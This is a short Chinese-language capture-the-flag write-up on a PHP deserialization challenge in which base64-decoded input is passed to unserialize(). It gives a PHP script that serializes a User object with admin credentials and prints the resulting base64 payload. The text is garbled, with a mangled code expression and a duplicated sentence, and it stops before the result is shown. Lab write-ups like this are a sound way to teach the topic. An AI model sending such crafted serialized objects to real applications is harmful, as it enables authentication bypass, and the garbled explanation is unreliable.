打开题目在线环境:
题目给的源码提示我们反序列化,但是重点在输入框里面的那一句**user = unserialize(base64_decode( d a t a ) ) ; ∗ ∗ 将一个 B a s e 64 编码的字符串 data));** 将一个Base64编码的字符串 data));∗∗将一个Base64编码的字符串data解码并反序列化,直接写脚本:
<?phpclass User{public $username;public $password;
}
$a=new User();
$a->username="admin";
$a->password="secure_password";
echo base64_encode(serialize($a));?>
运行出来:** Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=**
就能得到:
